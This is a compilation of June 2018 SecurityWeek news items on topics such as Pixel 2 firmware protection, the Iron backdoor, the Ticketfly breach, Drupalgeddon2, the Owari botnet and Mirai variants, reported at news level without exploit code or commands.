Google has been demanding full-disk encryption for new Android devices since 2015, and the newly implemented protection is meant to complement that security feature. Google Pixel devices also encrypt all user data, and keep the encryption key protected in secure hardware.

“The secure hardware runs highly secure firmware that is responsible for checking the user's password. If the password is entered incorrectly, the firmware refuses to decrypt the device. This firmware also limits the rate at which passwords can be checked, making it harder for attackers to use a brute force attack,” Google explains in a blog post.

Google is also applying digital signatures in their attempt to prevent attackers from replacing a device’s firmware with a malicious iteration. To replace the firmware, an attacker would have to find and exploit a vulnerability in the signature-checking process, or to gain access to the signing key, then sign their firmware version to trick the device into accepting it.

While the signature-checking software is small, isolated, and vetted, which makes exploitation difficult, the signing keys are accessible because they are stored in secure locations, although only a limited number of people have access to them.

“That's good, but it leaves those people open to attack by coercion or social engineering. That's risky for the employees personally, and we believe it creates too much risk for user data,” Google notes.

Google Pixel 2 devices, the Internet giant says, have insider attack resistance in the tamper-resistant hardware security module to protect the encryption keys. Thus, if an attacker does come up with a properly signed malicious firmware, they cannot install it on the security module without the user's cooperation.

Specifically, the correct password is required to upgrade the firmware. While upgrades can be forced, the company says, the process would wipe the secrets used to decrypt the user's data, effectively destroying it.

“The Android security team believes that insider attack resistance is an important element of a complete strategy for protecting user data. The Google Pixel 2 demonstrated that it's possible to protect users even against the most highly-privileged insiders. We recommend that all mobile device makers do the same,” Google notes.

Cyber Range Developer Cyberbit Raises $30 Million
6.6.2018 securityweek IT

Israel-based Cyberbit Ltd., a provider of cyber range training and simulation platforms, announced on Monday that it has received a $30 million investment from Claridge Israel.

Cyberbit offers a cyber range for simulated cyber training, and a detection and response platform to help protect an organization’s attack surface across IT, OT and IoT networks.

Founded in 2015, Cyberbit is a subsidiary of Elbit Systems and has offices in Israel, Unites States, Europe, and Asia.

With the funding, Cyberbit says it will expand sales and marketing, primarily in North America, boost product development, and enhance customer and partner support.

“Cyberbit’s growth in just three years has been remarkable,” said Rami Hadar, Managing Director at Claridge Israel. “This growth is driven by a unique product portfolio that addresses several of the most pressing industry problems, a solid go-to-market strategy and a highly capable team that is executing successfully and creating a leadership position in several markets.”

Federal Agencies Respond to 2017 Cybersecurity Executive Order
6.6.2018 securityweek BigBrothers

Federal Agencies Respond to 2017 Cybersecurity Executive Order

The U.S. Department of State, the Department of Homeland Security (DHS), the Department of Commerce, and the Office of Management and Budget (OMB) last week published reports in response to the cybersecurity executive order signed by President Donald Trump last year in an effort to improve the protection of federal networks and critical infrastructure against cyberattacks.

Department of State on deterring adversaries

The Department of State has published two reports with recommendations to President Trump on reducing the risk of cyber conflict, detering malicious actors, maintaining an open and interoperable Internet, and protecting the country’s cyber interests through international cooperation.

The State Department believes the United States can deter both state and non-state actors using two approaches: improving the security of its networks, and through “cost imposition.”

The goal is to prevent cyberattacks that can be classified as use of force, and a long-lasting reduction of less serious destructive and disruptive activities that fall below the use of force threshold.

“The President already has a wide variety of cyber and non-cyber options for deterring and responding to cyber activities that constitute a use of force. Credibly demonstrating that the United States is capable of imposing significant costs on those who carry out such activities is indispensable to maintaining and strengthening deterrence,” the State Department’s report reads.

It adds, “With respect to activities below the threshold of the use of force, the United States should, working with like minded partners when possible, adopt an approach of imposing swift, costly, and transparent consequences on foreign governments responsible for significant malicious cyber activities aimed at harming U.S. national interests.”

Criminal charges, prosecutions and sanctions can represent an efficient deterrent, but the government should make it clear to potential adversaries that they would face consequences if they engage in malicious cyber activities. However, these types of actions may not deter some threat actors, such as terrorists, in which case the solution is increasing the operational cost and complexity for the adversary to achieve its goal, the State Department said.

OMB report on cybersecurity risk determination

The Executive Office of the President through the OMB has published a Federal Cybersecurity Risk Determination Report and Action Plan, which assesses cybersecurity risk management capabilities across federal agencies and provides recommendations on addressing gaps.

An analysis of 96 civilian agencies showed that 71 of them had been assigned an “At Risk” or “High Risk” rating for their ability to identify, detect and respond to cyber incidents and recover from them.

“OMB and DHS also found that agencies are not equipped to determine how malicious actors seek to gain access to their information systems and data. This overall lack of timely threat information means agencies are spending billions of dollars on security capabilities without fully understanding the dangers their facing in the digital wild. This situation creates enterprise-wide gaps in network visibility, IT tool and capability standardization, and common operating procedures, all of which negatively impact Federal cybersecurity,” the OMB said in its report.

The OMB and DHS have detailed the actions required to address cybersecurity risks and say they have already started implementing them.

Department of Commerce and DHS on enhancing resilience against botnets

The Department of Commerce and DHS have published a report on enhancing the resilience of the Internet against botnets and other automated threats.

After collecting data on the matter, the agencies determined that international collaboration is needed due to many devices ensnared by botnets being located outside the U.S. They also believe this challenge can only be solved through collaboration between different stakeholders.

The organizations found that while the tools and processes required to address the problem exist, they are not applied in some market sectors due to various reasons, including budgets, lack of awareness, lack of incentives, and insufficient technical expertise.

“The recommended actions and options include ongoing activities that should be continued or expanded, as well as new initiatives. No single investment or activity can mitigate all threats , but organized discussions and stakeholder feedback will allow us to further evaluate and prioritize these activities based on their expected return on investment and ability to measurably impact ecosystem resilience,” reads the report from the DHS and the Department of Commerce.

DHS and Commerce on cybersecurity workforce

The DHS and the Commerce Department also published a report on supporting the growth and sustainment of the United States’ cybersecurity workforce.

According to the report, there had been nearly 300,000 cybersecurity-related job openings in the United States as of August 2017. The agencies believe veterans represent an underutilized workforce supply, and women and minorities are underrepresented in the field. They admit that while pay for cybersecurity roles is typically above average, the government pays cybersecurity staff below the level needed to attract the necessary talent.

“A successful cybersecurity workforce strategy for the Nation should include an enhanced focus upon the value of diversity and inclusion and convert it into a potent resource that can be used to great advantage. Fostering and sustaining a diverse workforce will support the ability to find new talent to carry out this effort and to uncover novel ways to solve problems. Integrating cyber security concepts in to our primary and secondary education curricula will generate early interest in cyber security in a manner that cuts across all sectors of American society. Among workforce - aged adults, veterans, women, minorities, and the economically disadvantaged should be aggressively recruited, without compromising required standards,” the report reads.

Cyber Range Developer Cyberbit Raises $30 Million
6.6.2018 securityweek IT

Israel-based Cyberbit Ltd., a provider of cyber range training and simulation platforms, announced on Monday that it has received a $30 million investment from Claridge Israel.

Cyberbit offers a cyber range for simulated cyber training, and a detection and response platform to help protect an organization’s attack surface across IT, OT and IoT networks.

Founded in 2015, Cyberbit is a subsidiary of Elbit Systems and has offices in Israel, Unites States, Europe, and Asia.

With the funding, Cyberbit says it will expand sales and marketing, primarily in North America, boost product development, and enhance customer and partner support.

“Cyberbit’s growth in just three years has been remarkable,” said Rami Hadar, Managing Director at Claridge Israel. “This growth is driven by a unique product portfolio that addresses several of the most pressing industry problems, a solid go-to-market strategy and a highly capable team that is executing successfully and creating a leadership position in several markets.”

New Backdoor Based on HackingTeam’s Surveillance Tool
6.6.2018 securityweek

A recently discovered backdoor built by the Iron cybercrime group is based on the leaked source code of Remote Control System (RCS), HackingTeam’s infamous surveillance tool, security firm Intezer reports.

The Iron group is known for the Iron ransomware (which a rip-off Maktub malware) and is believed to have been active for around 18 months.

During this time, the cybercriminals built various malware families, including backdoors, crypto-miners, and ransomware, and targeted Windows, Linux, and Android devices. To date, the group is believed to have infected at least a few thousand victims.

Their new backdoor, the security researchers say, was first observed in April this year and features an installer protected with VMProtect and compressed using UPX.

During installation, it checks if it runs in a virtual machine, drops and installs a malicious Chrome extension, creates a scheduled task, creates a mutex to ensure only one instance of itself is running, drops the backdoor in the Temp folder, then checks OS version and launches the backdoor based on the platform iteration.

The malware also checks if Qhioo360 products are present on the systems and only proceeds if none is found. It also installs a malicious certificate to sign the backdoor binary as root CA, then creates a service pointing back to the backdoor.

Part of the backdoor’s code is based on HackingTeam’s leaked RCS source code, the researchers say. Specifically, the cybercriminals used two main functions in their IronStealer and Iron ransomware families.

These include a virtual machine detection code taken directly from HackingTeam’s “Soldier” implant (which targets Cuckoo Sandbox, VMware products, and Oracle’s VirtualBox) and the DynamicCall module from HackingTeam’s “core” library (dynamically calls external library function by obfuscating the function name, thus making static analysis more difficult).

The malicious Chrome extension dropped by the malware is a patched version of Adblock Plus, which injects an in-browser crypto-mining module (based on CryptoNoter) and an in-browser payment hijacking module.

The extension constantly runs in the background, as a stealth host based crypto-miner. Every minute, the malware checks if Chrome is running, and can silently launch it if it doesn’t.

The backdoor also embeds Adblock Plus for IE, also modified similarly to the Chrome extension and capable of injecting remote JavaScript. This functionality, however, is no longer automatically used, the researchers discovered.

If Qhioo360 Safe Guard or Internet Security are found on the system, the malware runs once, without persistence. Otherwise, it installs the aforementioned rogue, hardcoded root CA certificate to make the backdoor binary seem legitimate.

The malware would decrypt a shellcode that loads Cobalt Strike beacon in-memory, and fetches a payload URL from a hardcoded Pastebin paste address.

Two different payloads were dropped by the malware, namely Xagent, a variant of “JbossMiner Mining Worm,” and the Iron ransomware, which started being dropped only recently.

The Iron backdoor drops the latest voidtool Everything search utility and silently installs it to use it for finding files likely containing cryptocurrency wallets (it targets around 20 wallets).

“IronStealer constantly monitors the user’s clipboard for Bitcoin, Monero & Ethereum wallet address regex patterns. Once matched, it will automatically replace it with the attacker’s wallet address so the victim would unknowingly transfer money to the attacker’s account,” the researchers explain.

Apple Touts Privacy Features of New Operating Systems
6.6.2018 securityweek Apple

Apple on Monday said new operating systems powering its mobile devices and computers would include features designed to thwart the use of secret trackers to monitor people's online activities.

The announcement by Apple comes amid a growing focus on protecting privacy following a Facebook data scandal and new rules being enforced by the European Union for online services.

Apple, kicking off its annual developers conference, announced that coming versions of software powering iPhone and Mac computers will block the use of so-called "cookies" from "like" buttons that can follow people from one website to another.

"Turns out 'like' buttons and 'comment' fields can be used to track you, so this year we are shutting that down," Apple senior vice president of software engineering Craig Federighi told a standing-room crowd of some 6,000 developers at Apple's Worldwide Developers Conference in the heart of Silicon Valley.

New MacOS Mojave and iOS 12 software to be release later this year will also make it harder to use trackers to create "unique fingerprints" by gleaning data about devices being used, according to Federighi.

"It will become dramatically more difficult for data companies to identify your device and track you," Federighi said.

"We are bringing all these protections to both Mojave and iOS 12."

Enhanced privacy was part of a slew of improvements touted by Apple to developers, whose creations are key to the popularity of iPhones, iPads and Mac computers.

Apple's software upgrades also include features that help users understand how much time they are spending on their devices, amid concerns of growing smartphone "addiction."

26 Million Users Hit by Ticketfly Hack
6.6.2018 securityweek Hacking

Ticketfly, the ticket distribution service owned by Eventbrite, has started restoring services after its website was defaced by a hacker who also gained access to user information.

The attack took place on or around May 30, when a hacker decided to exploit a vulnerability he had found in Ticketfly systems. The attacker, using the online moniker “IsHaKdZ,” reportedly asked the company to pay 1 bitcoin for information on the security hole. Since Ticketfly did not comply with his request, IsHaKdZ defaced ticketfly.com and the websites of several music venues.

The hacker also stole and leaked the details of Ticketfly customers and employees. Troy Hunt, the owner of the Have I Been Pwned data breach notification service, has analyzed the data and determined that over 26 million unique users are impacted. The compromised data includes email addresses, names, physical addresses and phone numbers.

The hack appears to have targeted Ticketfly’s WordPress-based assets. WordPress is also used for Ticketfly-powered websites provided to music venues, which would explain how the hacker managed to deface several sites.

Ticketfly hacked

Ticketfly says it has started restoring some of the affected services, including Box Office, Emailer, reporting, scanning, printing, and ticket purchasing systems.

“We’re rolling out a secure website solution as an alternative to your Ticketfly-powered site to meet your immediate needs. We’ve built a secure, non-WordPress based website solution with your existing domain, and your site will appear sometime today,” the company told customers in an updated FAQ.

The company has not shared too many details on the impact of the breach, but it has confirmed that names, addresses, email addresses, and phone numbers belonging to Ticketfly fans have been compromised.

“Our investigation into the incident is ongoing. It's critical that the information we share with you is accurate and backed by certainty. We are working with a team of forensic cybersecurity experts; the reality is cyber incidents are unique, and the investigations typically take more time than one would like because the full picture of what happened isn't always quick to develop,” Ticketfly said.

Germany's Continental Bans WhatsApp From Work Phones
6.6.2018 securityweek

German car parts supplier Continental on Tuesday said it was banning the use of WhatsApp and Snapchat on work-issued mobile phones "with immediate effect" because of data protection concerns.

The company said such social media apps had "deficiencies" that made it difficult to comply with tough new EU data protection legislation, especially their insistence on having access to a user's contact list.

"Continental is prohibiting its employees from using social media apps like WhatsApp and Snapchat in its global company network, effective immediately," the firm said in a statement.

Some 36,000 employees would be affected by the move, a Continental spokesman told AFP.

The company, one of the world's leading makers of car parts, has over 240,000 staff globally.

A key principle of the European Union's new general data protection regulation (GDPR), which came into force on May 25, is that individuals must explicitly grant permission for their data to be used.

But Continental said that by demanding full access to address books, WhatsApp for example had shifted the burden onto the user, essentially expecting them to contact everyone in their phone to let them know their data was being shared.

"We think it is unacceptable to transfer to users the responsibility of complying with data protection laws," said Continental's CEO Elmar Degenhart.

The Hanover-based firm said it stood ready to reverse its decision once the service providers "change the basic settings to ensure that their apps comply with data-protection regulations by default".

The issue of how personal information is used and shared online was given fresh urgency after Facebook earlier this year admitted to a massive privacy breach that allowed a political consultancy linked to US President Donald Trump's 2016 campaign to harvest the data of up to 87 million users.

Many Drupal Sites Still Vulnerable to Drupalgeddon2 Attacks
6.6.2018 securityweek Attack

At least 115,000 websites powered by version 7 of the Drupal content management system are still vulnerable to Drupalgeddon2 attacks, despite patches being available since late March.

The flaw dubbed Drupalgeddon2 is officially tracked as CVE-2018-7600. It allows a remote attacker to execute arbitrary code and take complete control of a website running Drupal 6, 7 or 8. The issue has been patched since the release of versions 7.58, 8.5.1, 8.3.9 and 8.4.6, with fixes also available for Drupal 6, which is no longer supported since February 2016.

Drupalgeddon2 has been exploited by malicious actors for both server-side and client-side attacks that deliver cryptocurrency miners, backdoors, RATs and tech support scams.Many Drupal websites still affected by Drupalgeddon 2 vulnerability

Despite the high risk of attacks, many administrators of Drupal websites still haven’t applied the patches.

Researcher Troy Mursch has conducted an analysis of Drupal 7 websites – Drupal 7 is the most widely used version and it currently powers more than 830,000 sites – and found that many are still vulnerable.

Mursch identified nearly 500,000 Drupal 7 websites through the PublicWWW source code search engine and found that 115,070 had been running outdated and vulnerable versions of the CMS. The analysis showed that roughly 134,000 sites had not been vulnerable, while for 225,000 the version they had been using could not be determined.

“Numerous vulnerable sites found in the Alexa Top 1 Million included websites of major educational institutions in the United States and government organizations around the world. Other notable unpatched sites found were of a large television network, a multinational mass media and entertainment conglomerate, and two well-known computer hardware manufacturers,” Mursch wrote on his Bad Packets Report blog.

The list of vulnerable websites has not been made public, but the researcher did send it to US-CERT and the Drupal Security Team.

While conducting the analysis, Mursch discovered a significant cryptojacking campaign that leverages the Coinhive service. Malicious actors managed to compromise at least 258 Drupal sites and abused them to mine for cryptocurrency. The list of victims included the Attorney General’s Office in Colorado, a police department in Belgium, and Fiat-owned automotive parts manufacturer Magneti Marelli.

An India-based research organization hit by this campaign had updated Drupal, but it failed to remove the malicious code. As the Drupal Security Team warned, updating the CMS does not remove malicious code from already compromised websites.

This is the second cryptojacking campaign discovered by Mursch since the disclosure of Drupalgeddon2. In early May, he reported discovering more than 300 websites hacked in a similar operation, including sites belonging to universities and governments.

During the analysis of Drupalgeddon2, the Drupal Security Team and developer Jasper Mattsson, who also reported the original vulnerability, identified another flaw. This second vulnerability, tracked as CVE-2018-7602 and dubbed by some Drupalgeddon3, has also been exploited in the wild.

Apple Boosts Security in iOS 12, macOS Mojave
6.6.2018 securityweek Apple

At its Worldwide Developers Conference (WWDC) 2018 this week, Apple shared information on the security improvements that iOS 12 and macOS Mojave are set to bring when they arrive this fall.

While previewing the next platform iterations at the event, Apple revealed features that will change the overall user experience on both mobile and desktop devices, but also presented enhancements that should improve the overall privacy and security of its users.

One of the main changes impacts the Safari browser on both iOS and macOS, which will soon deliver improved Intelligent Tracking Prevention capabilities, preventing social media buttons (such as “Like” and “Share”) from tracking users without permission.

“Safari now also presents simplified system information when users browse the web, preventing them from being tracked based on their system configuration,” the iPhone maker says.

Other features the company previewed for the upcoming platform iterations include end-to-end encryption for Facetime group calls and password managers integrated into macOS and iOS, to help users employ stronger passwords, store them securely, and automatically enter them when needed.

“Safari now also automatically creates, autofills and stores strong passwords when users create new online accounts and flags reused passwords so users can change them,” Apple said.

On macOS Mojave, new data protections will require applications to ask for user permission before using the camera and microphone or before accessing personal data such as mail history and messages database, the tech giant also says. This should prevent malicious software from spying on users.

To further strengthen user privacy, Apple also appears set to roll out a USB Restricted Mode in iOS 12, a feature that was initially noticed in iOS 11.3 beta, but later removed, only to be introduced in iOS 11.4 beta again.

With this new feature, an iPhone connected via USB to a computer (or to an USB accessory) will ask for the passcode every week, or it will lock down the Lightning port in charge only mode, thus preventing access to the data.

“To improve security, for a locked iOS device to communicate with USB accessories you must connect an accessory via lightning connector to the device while unlocked—or enter your device passcode while connected—at least once a week,” Apple described the feature in iOS 11.3 beta.

As ElcomSoft’s Oleg Afonin pointed out last month, this means that law enforcement agencies attempting to retrieve data from a suspect’s iPhone will only have a small window of opportunity before the device locks down. The same applies to thieves and anyone else targeting that data.

The new feature appears as a reaction to a clash with the FBI a couple of years ago over the unlocking of the San Bernardino shooter’s iPhone. The legal battle eventually sparked a debate between supporters of backdoors in user products to facilitate criminal and national security investigations, and those who want data to be properly protected.

Later this month, as part of iOS 12 public beta, users will also take advantage of increased control over notifications, and will get detailed information on the time spent on the phone, courtesy of a new Screen Time feature. There’s also an App Limits feature to limit the time spent in an app, which gives parents more control over their children’s use of a mobile device.

IBM Adds New Features to MaaS360 with Watson UEM Product
6.6.2018 securityweek IT

IBM announced on Monday that it has added two new important features to its “MaaS360 with Watson” unified endpoint management (UEM) solution.

UEM solutions allow enterprise IT teams to manage smartphones, tablets, laptops and IoT devices in their organization from a single management console.

IBM has improved its MaaS360 with Watson UEM product with two capabilities the company says can be highly useful for IT departments: app intelligence and reporting, and security policy recommendations.

Business Dashboards for Apps is designed to provide administrators information on mobile applications and how they are used by employees. This can help them get a better understanding of which apps require attention and investment and which ones can be removed.

IT teams can obtain information on the number of installs (by platform, manufacturer and ownership), usage (popularity and session length), performance (crashes and data usage), and trend information (crashes, network requests and data consumption over a period of six months). Admins can also apply filters to make analysis easier and more useful.

The second new feature, the Policy Recommendation Engine, helps IT teams by dynamically providing recommendations when configuring security policies. Recommendations are provided based on the organization’s profile and common practices observed at similar companies in the MaaS360 community.

“Imagine a way to configure your policies with guidance that is dynamically presented every step of the way, catered to your organization and the size of your deployment. Whether you’re new to the game — or have been managing policies for years — a little confidence in your configurations goes a long way,” IBM Security’s John Harrington Jr. said in a blog post.

IBM also announced this week the launch of Guardium Analyzer, a new tool that uses a specialized data classification engine and data patterns to identify and classify GDPR-relevant information across cloud and on-premise systems. The tool can also identify the databases most likely to fail a GDPR-focused audit, the company said.

Oops! Botnet Operators Use Default Credentials on Command and Control Server
6.6.2018 securityweek BotNet  IoT

Internet of Things (IoT) botnets prey on the use of default or weak credentials to compromise connected devices, but the operators of such a botnet also used default credentials in their operations.

As NewSky Security researchers recently discovered, the operators of the Mirai variant Owari botnet used default credentials on their command and control (C&C) server, thus allowing easy access their database.

First spotted in late 2016, Mirai was designed to target poorly secured devices to ensnare them into large distributed denial of service (DDoS) botnets. Ever since its source code leaked online, Mirai spawned numerous variants, such as Masuta, Satori, and Okiru, as well as the more recent Wicked, Sora, Owari, and Omni iterations.

What most of these variants inherit from Mirai, the security researchers say, is the use of a MySQL database server for C&C. This database, they reveal, contains three tables: users, history, and whitelist.

A recently observed Mirai variant named Owari is using this MySQL server structure, but its operators made the very same mistakes as the owners of the devices they targeted: they failed to properly secure the server.

Thus, NewSky Security stumbled upon an Owari server on IP 80(.)211(.)232(.)43, with port 3306, the default port for MySQL database, open to the Internet.

What’s more, the security researchers discovered that the attackers used the root:root username and password pair, “one of the weakest credentials known to mankind,” to secure the database, and also enabled read/write access to everyone.

As Dr. Vesselin Bontchev points out, it’s not that easy to make a MySQL database accessible from anywhere, nonetheless to secure it so poorly that anyone can connect to it.

4 Jun
It's not exactly spelled out in the article, but the perp wasn't just stupid (using weak credentials). He was *creatively* stupid. You have to try hard, in order to make a MySQL database accessible to the whole world. Not something you can do accidentally. https://twitter.com/ankit_anubhav/status/1003741307024625666 …

Like, by default, MySQL listens only to localhost. If you really want to shoot yourself in the foot and access it over the Internet, it forces you to define *triplets* of user/password/host from which the database is accessible.

11:08 PM - Jun 4, 2018
See Vess's other Tweets
Twitter Ads info and privacy
Having access to the database, the security researchers glanced through the three tables. The users table contained login credentials (for both malware authors and customers), and information such as attack duration limits, maximum available bots, and cooldown time between commands.

“In the specific Owari case, we observe one user with duration limit of 3600 seconds with permissible bot usage set as -1 (maximum). It is to be noted that the credentials of all these botnet users are also weak,” the security researchers reveal.

The history table revealed details on attacks carried out against various IPs (some were IoT botnet related, suggesting that the attacker might have tried to target rival botnet operators), while the whitelist table was empty, suggesting that the botnet would attack any IP or device.

The security researchers also discovered that this was only one of the two Owari-related MySQL databases exposed to the Internet and secured with root:root, with the second one located at IP 80(.)211(.)45(.)89.

Unfortunately, although they gained write access to the MySQL databases, the researchers couldn’t disrupt the botnet, because C&C-related IPs usually have a short lifespan, as they tend to be flagged fast due to bad network traffic. Thus, they often change the IPs, and the two mentioned above are already offline.

Ankit Anubhav, Principal Researcher, NewSky Security, reveals that they decided to contact an Owari operator to ask about the revenue model, and learned that the cost of hiring the botnet is of $60 per month, which involves “around 600 seconds of bot time.” Because of that, the operator can “guarantee a stable bot count,” and can cover expenses with 10 to 15 customers each month.

Flaw in F-Secure Products Allowed Code Execution via Malicious Archives
6.6.2018 securityweek

A critical vulnerability affecting many consumer and corporate products from F-Secure could have been exploited for remote code execution using specially crafted archive files.

A researcher who uses the online moniker “landave” has identified several vulnerabilities related to 7-Zip, an open source file archiver used by many commercial products. Some of the security holes impact 7-Zip and products using it, while others are specific to the third-party implementations of 7-Zip.

Some of the vulnerabilities, disclosed in 2017, impact Bitdefender products. On Tuesday, landave published a blog post describing how one of the 7-Zip bugs he identified last year, namely CVE-2018-10115, can be used to achieve remote code execution on most F-Secure endpoint protection products for Windows.

The details of the vulnerability have been disclosed after F-Secure rolled out a patch via its automatic update mechanisms on May 22. Users don’t need to take any action, unless they explicitly disabled automatic updates.

The list of impacted products includes F-Secure SAFE for Windows, Client Security, Client Security Premium, Server Security, Server Security Premium, PSB Server Security, Email and Server Security, Email and Server Security Premium, PSB Email and Server Security, PSB Workstation Security, Computer Protection, and Computer Protection Premium.

Exploiting the vulnerability against 7-Zip directly was relatively easy and it only required the targeted user to extract a specially crafted RAR file. However, in the case of F-Secure products, exploitation is more difficult due to the use of the Address Space Layout Randomisation (ASLR) memory protection system.

However, landave has found a way to bypass the protection and achieve code execution via malicious RAR files. The attacker could have sent the malicious file to the victim attached to an email, but this attack scenario required that the recipient manually trigger a scan of the file.

A more efficient method involved getting the victim to visit a malicious web page set up to automatically download the exploit file.

“It turns out that F-Secure’s products intercept HTTP traffic and automatically scan files with up to 5MB in size. This automatic scan includes (by default) the extraction of compressed files. Hence, we can deliver our victim a web page that automatically downloads the exploit file. To do this silently (preventing the user even from noticing that a download is triggered), we can issue an asynchronous HTTP request,” the researcher explained.

In its own advisory, F-Secure said the flaw could have been exploited to take complete control of a system, but there was no evidence of exploitation before the release of the patch.

The security firm also pointed out that some user interaction was required for the exploit to work and noted that archive scanning is only triggered if the “Scan inside compressed files” option is enabled.

F-Secure has paid out a bug bounty, but the amount has not been disclosed. According to its Vulnerability Rewards Program page, the company offers up to €5,000 ($5,800) for vulnerabilities that allow remote code execution on the client software.

Fortinet Acquires Bradford Networks to Extend Security to the Edge
6.6.2018 securityweek IT

Fortinet has acquired Boston-based network security firm Bradford Networks. The purpose is to extend Fortinet's micro segmentation to the new perimeter: that is, the IoT and mobile edge.

A Fortinet spokesperson told SecurityWeek that it paid approximately $17 million in initial consideration, net of cash acquired and subject to certain adjustments. It may pay an additional $2 million as an earn-out, subject in certain performance conditions. According to Crunchbase, Bradford had raised roughly $14 million in funding.

Gartner predicts that the currently estimated 4 billion enterprise connected devices will grow to 7.5 billion in the next two years. Making sure that every one of those devices is both known and secure is difficult. It is, suggests Fortinet in a blog, a 'classic' example of the asynchronous security problem: "Security managers need to secure every single device every single time, while criminals only need one open port, one compromised or unknown device, or one uncontained threat to circumvent all of the effort going into securing the network."

"As large organizations continue to see high growth in network traffic and the number of devices and users accessing their networks," explains Ken Xie, founder, chairman of the board and CEO at Fortinet, "the risk of breach increases exponentially. According to a recent Forrester study, 82 percent of companies surveyed are unable to even identify all devices accessing their networks. The integration of Bradford Networks' technology with Fortinet's security fabric enables large enterprises with the continuous visibility, micro-segmentation and access control technology they need to contain threats and block untrusted devices from accessing the network."

Bradford Networks enhances Fortinet's Security Fabric by providing agentless visibility of endpoints, users, devices, and applications that access the complete corporate network including headless devices and IoT. It brings security to IoT through device micro segmentation and automatic policy assignment, allowing granular isolation of unsecure devices.

Once visibility of all devices that connect to the network is attained, the next step is to make sure they are authenticated or authorized, and are subject to a context driven policy that defines who, what, when, and where connectivity is permitted.

"Such an approach -- where no unknown devices ever gain access to the corporate infrastructure, permitted devices are automatically segmented based on policies and roles, and connected devices that begin to behave badly are immediately quarantined from the network," says Fortinet, "becomes the foundation for a comprehensive positive security posture."

Fortinet's share price has grown steadily, from $35.83 in September 2017 to $62.48 at the start of 4 June 2018. A slight dip occurred with the Bradford Networks announcement (down to $61.70), but the share price has already risen above the pre-acquisition price to its highest ever value at $62.92, at the time of writing.

Fortinet does not expect the transaction to have a material impact on the company's second quarter or full year 2018 financial guidance disclosed on May 3, 2018.

Rob Scott, CEO at Bradford Networks, said, "We are excited to join with Fortinet, the leader in network security to deliver exceptional visibility and security at scale to large enterprise organizations. Bradford Networks' technology is already integrated with Fortinet's Security Fabric including FortiGate, FortiSIEM, FortiSwitch and FortiAP products to minimize the risk and impact of cyber threats in even the toughest security environments such as critical infrastructure - power, oil and gas and manufacturing."

Bradford Networks, the Fortinet spokesperson said, "will become part of the Fortinet brand and will enrich Fortinet’s IoT offering. The majority of Bradford Networks employees will transfer to Fortinet and be integrated across multiple functions based on areas of responsibilities."

Facebook Says Chinese Phone Makers Got Access to Data
6.6.2018 securityweek

Facebook on Tuesday confirmed that a Chinese phone maker deemed a national security threat by the US was among companies given access to data on users.

Huawei was able to access Facebook data to get the leading social network's applications to perform on smartphones, according to the California-based company.

"Facebook along with many other US tech companies have worked with them and other Chinese manufacturers to integrate their services onto these phones," Facebook mobile partnerships leader Francisco Varela said in a released statement.

"Given the interest from Congress, we wanted to make clear that all the information from these integrations with Huawei was stored on the device, not on Huawei's servers."

Facebook also had data access deals with Lenovo, OPPO and TCL of China, according to Varela.

"Facebook's integrations with Huawei, Lenovo, OPPO and TCL were controlled from the get go," Varela said.

Huawei has long disputed any links to the Chinese government, while noting that its infrastructure and computing products are used in 170 countries.

"Concerns about Huawei aren't new," US Senator Mark Warner, vice chairman of the senate select committee on intelligence, said Tuesday in a released statement.

"I look forward to learning more about how Facebook ensured that information about their users was not sent to Chinese servers."

Facebook said that it does not know of any privacy abuse by cellphone makers who years ago were able to gain access to personal data on users and their friends.

Before now-ubiquitous apps standardized the social media experience on smartphones, some 60 device makers like Amazon, Apple, Blackberry, HTC, Microsoft and Samsung worked with Facebook to adapt interfaces for the Facebook website to their own phones, the company said.

Facebook said it is winding up the interface arrangements with device makers as the company's smartphone apps dominate the service. The integration partnership with Huawei will terminate by the end of this week, according to the social network.

The social media leader said it "disagreed" with the conclusions of a New York Times report that found that the device makers could access information on Facebook users' friends without their explicit consent.

Facebook enabled device makers to interface with it at a time when it was building its service and they were developing new smartphone and social media technology.

But the report raised concerns that massive databases on users and their friends -- including personal data and photographs -- could be in the hands of device makers.

Mirai Variants Continue to Spawn in Vulnerable IoT Ecosystem
6.6.2018 securityweek BotNet

Mirai is the archetypal IoT botnet, first achieving infamy with a 665 Gbps DDoS attack against the KrebsOnSecurity website in September 2016. Within days, a second Mirai attack targeted the French hosting firm, OVH, with an attack that peaked at nearly 1 Tbps. These were, at the time, the largest DDoS attacks ever recorded.

But within a few more days, before the end of September 2016, the Mirai developer released the source code. It can now be found on GitHub. The developer closed his 'readme' file with a criticism of MalwareMustDie and the comment, "Just as I forever be free, you will be doomed to mediocracy forever."

He didn't remain free for very long. In January 2017, Brian Krebs identified Paras Jha as authoring Mirai; and in December 2017 the DoJ unsealed a plea-bargained guilty plea by Paras Jha for the development and use of Mirai. But it was too late to stop Mirai, because the code was in the public domain -- and it has ever since been used as the basic building block for other criminals to develop Mirai variants for their own use.

IoT ExploitsNetwork performance firm Netscout Arbor has taken a close look at four of the current Mirai variants: Satori, JenX, OMG and Wicked. Its Arbor Security Engineering & Response Team (ASERT) published in a recent blog post, describing how each of these botnets start from the basic building blocks of Mirai and add to and sometimes remove from the original Mirai functionality -- adding, says, ASERT, "their own flair."

Mirai itself spread by scanning for other internet-connected IoT devices (IP cameras and home routers) and 'brute-forcing' access via a list of default vendor passwords. Since so few consumers ever change the password that comes with the device, the process is remarkably successful. Paras Jha claimed that he had 380,000 bots in Mirai at the time of the Krebs attack.

Satori (or at least the 3rd variant of Satori) uses the same configuration table and the same string obfuscation technique as Mirai. However, says ASERT, "We see the author expanding on Mirai source code to include different exploits such as the Huawei Home Gateway exploit." The exploit was CVE-2017-17215. In December 2017, Check Point reported that hundreds of thousands of attempts to exploit this vulnerability had been made on Huawei HG532 home routers attempting to download and execute the Satori botnet.

The underlying code for JenX also comes from Mirai, again including the same configuration table and the same string obfuscation technique. However, JenX hard codes the C2 IP address while Mirai stores it in the configuration table. JenX has also removed the scanning and exploitation functions of Mirai, with this being handled by a separate system.

"Currently," writes ASERT, "it appears JenX only focuses on DDoS attacks against players of the video game Grand Theft Auto San Andreas, which has been noted by other researchers."

OMG is described by ASERT as one of the most interesting of Mirai variants. While it includes all Mirai's functionality, "the author expanded the Mirai code to include a proxy server." This allows it to enable a SOCKS and HTTP proxy server on the infected IoT device. "With these two features, the bot author can proxy any traffic of its choosing through the infected IoT device, including additional scans for new vulnerabilities, launching additional attacks, or pivot from the infected IoT device to other networks which are connected to the device."

